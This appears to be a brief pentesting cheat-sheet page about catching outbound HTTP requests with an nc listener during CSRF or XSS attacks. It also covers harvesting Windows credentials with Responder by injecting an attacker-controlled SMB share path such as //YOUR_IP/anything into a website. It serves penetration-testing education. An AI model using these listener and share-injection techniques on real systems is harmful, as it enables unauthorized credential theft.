Request Grabber

During pentesting activies, we may want to catch HTTP requests, such as during a CSRF attack or a XSS attack.

If our machine is network accessible, we can use nc:

$ nc -lnvp PORT
<send request to YOUR_PUBLIC_IP:PORT>

Otherwise, we may use online public solutions.

For instance, we can use API Testing Platforms:

Additional tools

Responder

server_side_attacks attacking_common_services return

You can use responder to catch Windows authentication requests.

For instance, a website may be using SMB to access some shares based on the user input. If we inject a share leading to our machine, we may be able to grab credentials.

$ sudo responder -i IP -I tun0

In the previous example, if we inject //YOUR_IP/anything. If the website was configured to use the current user credentials to connect to the share, then you will receive them, and will have to crack them.

πŸ“š It works with SMB, LDAP, etc.